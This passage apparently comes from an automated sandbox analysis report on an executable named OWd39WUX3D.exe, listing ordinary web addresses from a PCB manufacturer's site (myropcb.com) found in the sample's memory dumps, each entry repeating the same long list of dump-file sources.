              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=18.2.
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/js/easySlider.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, 